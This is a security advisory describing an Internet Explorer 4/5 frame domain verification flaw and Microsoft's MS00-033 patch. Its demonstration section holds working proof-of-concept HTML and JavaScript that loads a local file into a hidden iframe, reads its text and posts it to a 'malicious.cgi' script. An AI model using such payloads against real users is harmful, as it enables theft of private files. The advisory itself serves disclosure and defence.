IE Frame Domain Verification

 
IE Frame Domain Verification
Reported May 19 by
Andrew Nosenko

VERSIONS EFFECTED
  • Internet Explorer 4.x
  • Internet Explorer 5.x

    DESCRIPTION

    When a web server opens a frame within a window, the IE security model should only allow the parent window to access the data in the frame if they are in the same domain. However, two functions available in IE do not properly perform domain checking, with the result that the parent window could open a frame that contains a file on the local computer, then read it. This could allow a malicious web site operator to view files on the computer of a visiting user. The web site operator would need to know (or guess) the name and location of the file, and could only view file types that can be opened in a browser window.

    DEMONSTRATION

    <iframe id=clientContent width=0 height=0 noborder>
    </iframe>
    <script for=clientContent event="DocumentComplete(browser)">
    alert (browser.document.body.innerText);

    // browser is an instance of the IWebBrowser COM object

    document.forms\[0\].elements\[0\].value = browser.document.body.innerText;
    document.forms\[0\].submit ();

    </script>

    <script>
    clientContent.navigate("c:\\some_file.txt")
    </script>
    <form action="/cgi/malicious.cgi" method=post onSubmit="window.alert(document.forms\[0\].elements\[0\].value); return
    true">
    <input name="file_text" type=hidden>
    </form>

    VENDOR RESPONSE

    Microsoft has issued a patch for the problem.

    The patches require IE 4.01 Service Pack 2 or IE 5.01 to install. Customers using versions prior to these may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q262509.

    - Frequently Asked Questions: Microsoft Security Bulletin MS00-033,
    http://www.microsoft.com/technet/security/bulletin/fq00-033.asp

    - Knowledge Base article Q262509 discusses the overall patch

    - Knowledge Base articles Q251108 and Q255676 discuss the "Frame Domain Verification" vulnerability

    - Microsoft Knowledge Base article Q258430 discusses the
    "Unauthorized Cookie Access" vulnerability

    - Microsoft Knowledge Base article Q261257 discusses the
    "Malformed Component Attribute" vulnerability

    - Microsoft Knowledge Base (KB) article Q247333,
    Web Proxy Auto-Discovery "Spoofing" May Change Proxy Settings,
    http://www.microsoft.com/technet/support/kb.asp?ID=247333

    - Microsoft TechNet Security web site,
    http://www.microsoft.com/technet/security/default.asp

    CREDITS
    Discovered and reported by Andrew Nosenko

  • Hide comments

    Comments

    • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

    Plain text

    • No HTML tags allowed.
    • Web page addresses and e-mail addresses turn into links automatically.
    • Lines and paragraphs break automatically.
    Publish